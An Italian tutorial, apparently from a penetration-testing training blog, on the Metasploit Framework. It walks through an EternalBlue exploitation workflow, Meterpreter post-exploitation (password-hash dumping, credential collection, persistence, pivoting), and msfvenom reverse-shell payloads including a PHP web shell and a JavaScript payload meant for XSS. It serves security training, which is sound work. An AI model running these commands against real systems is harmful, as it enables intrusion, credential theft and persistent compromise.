Metasploit Tutorial in Italiano: Guida Pratica al Framework (2026)
1 luglio 2026 · di Pentevo
Metasploit Framework è il framework di exploitation più usato al mondo nel penetration testing professionale. Sviluppato da Rapid7, fornisce un ambiente unificato per trovare, validare e sfruttare vulnerabilità. Questa guida copre tutto il necessario per iniziare.
Cos'è Metasploit Framework
Metasploit non è solo una raccolta di exploit: è un framework completo che include:
- Moduli exploit — codice che sfrutta vulnerabilità specifiche
- Payload — codice eseguito dopo l'exploitation (Meterpreter, shell, ecc.)
- Moduli auxiliary — scanner, fuzzer, strumenti di ricognizione
- Post-exploitation — moduli per la fase dopo l'accesso iniziale
- msfconsole — l'interfaccia a riga di comando principale
Avvio e configurazione del database
# Avvia il servizio PostgreSQL (necessario per il database)
sudo systemctl start postgresql
# Inizializza il database Metasploit
sudo msfdb init
# Avvia msfconsole
sudo msfconsole
All'avvio vedrai il banner di Metasploit e il prompt msf6 >.
Comandi fondamentali di msfconsole
# Aiuto generale
help
# Ricerca di un modulo
search eternalblue
search type:exploit name:apache
# Selezione di un modulo
use exploit/windows/smb/ms17_010_eternalblue
# Informazioni sul modulo selezionato
info
show info
# Vedere le opzioni da configurare
show options
show required
# Impostare opzioni
set RHOSTS 192.168.1.100
set LHOST 192.168.1.50
set LPORT 4444
# Vedere i payload compatibili
show payloads
set PAYLOAD windows/x64/meterpreter/reverse_tcp
# Lanciare l'exploit
run
exploit
# Tornare al prompt principale
back
exit
Workflow tipico di exploitation
1. Ricognizione con moduli auxiliary
# Scanner SMB per versione
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.0/24
run
# Scanner per porte aperte
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.100
set PORTS 1-1000
run
2. Selezione e configurazione exploit
# Cerca l'exploit
search ms17-010
# Usa il modulo
use exploit/windows/smb/ms17_010_eternalblue
# Configura
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 4444
# Verifica configurazione
show options
# Lancia
run
3. Sessioni Meterpreter
Quando l'exploit ha successo, ottieni una sessione Meterpreter:
# Elenco sessioni attive
sessions
# Entrare in una sessione
sessions -i 1
# Comandi Meterpreter fondamentali
sysinfo # informazioni sistema
getuid # utente corrente
getsystem # elevazione privilegi
pwd # directory corrente
ls # lista file
upload file.txt # carica file
download file.txt # scarica file
shell # apri shell di sistema
hashdump # dump degli hash delle password
run post/windows/gather/enum_shares # enumerazione condivisioni
4. Post-exploitation
# Moduli post-exploitation
use post/windows/gather/credentials/credential_collector
set SESSION 1
run
# Persistenza
use post/windows/manage/persistence
set SESSION 1
run
# Pivot (tunneling attraverso il target)
route add 10.10.10.0/24 1
Generare payload con msfvenom
# Payload Windows reverso (exe)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe > payload.exe
# Payload Linux
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f elf > payload
# Payload PHP (web shell)
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw > shell.php
# Payload JavaScript (per XSS persistente)
msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw > shell.js
Impostare un multi-handler (listener)
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.50
set LPORT 4444
run -j # avvia in background come job
Ambienti di pratica
Usa Metasploit solo in ambienti autorizzati:
- Metasploitable — macchina virtuale intenzionalmente vulnerabile
- TryHackMe e HackTheBox — piattaforme CTF con scenari guidati
- VulnHub — VM scaricabili per pratica locale
Per capire meglio le vulnerabilità che Metasploit sfrutta, studia la nostra guida su OWASP Top 10 e approfondisci con i corsi CEH gratuiti di Pentevo Academy.
Domande frequenti
Metasploit è gratuito?
Sì, Metasploit Framework è open source e completamente gratuito. Esiste anche una versione commerciale chiamata Metasploit Pro con funzionalità aggiuntive come report automatici e un'interfaccia web, ma per il pentesting professionale e la formazione la versione Community è più che sufficiente.
Come si installa Metasploit?
Su Kali Linux è preinstallato. Su Ubuntu/Debian: curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb | sudo ruby. Su Windows è disponibile un installer grafico dal sito ufficiale di Rapid7.
Metasploit funziona solo su Linux?
No. Metasploit funziona su Linux, macOS e Windows. Tuttavia, la maggior parte dei professionisti lo usa su Kali Linux perché l'integrazione con gli altri strumenti è ottimale e le prestazioni sono migliori.
Qual è la differenza tra un exploit e un payload in Metasploit?
L'exploit è il codice che sfrutta una vulnerabilità specifica per guadagnare l'accesso iniziale. Il payload è il codice che viene eseguito dopo che l'exploit ha avuto successo — per esempio, una shell inversa (Meterpreter) che ti dà il controllo del sistema compromesso.
Letture correlate
Migliori Tool AI per Penetration Testing 2026: Guida Completa
I migliori strumenti AI per il penetration testing nel 2026: confronto per funzionalità, prezzi, casi d'uso. Da Pentevo a Intruder, tutti valutati.
ToolsI Migliori Tool per l'Ethical Hacking nel 2026: La Lista Completa
I migliori strumenti per l'ethical hacking nel 2026: Kali Linux, Metasploit, Burp Suite, Nmap e molto altro. Guida pratica per principianti e professionisti.
ToolsMigliori Tool per il Penetration Testing nel 2026: Guida Professionale
I migliori strumenti per il penetration testing professionale nel 2026: framework, scanner, exploit tool e piattaforme di gestione. Confronto e casi d'uso.
ToolsMigliori Vulnerability Scanner nel 2026: Confronto Completo
I migliori vulnerability scanner nel 2026: Nessus, OpenVAS, Qualys, Rapid7 e altri. Confronto su funzionalità, prezzo e casi d'uso per il mercato italiano.
Metti in pratica questi concetti
Pentevo Academy trasforma questi concetti in lezioni guidate, video e quiz — gratis.
Inizia a imparare gratis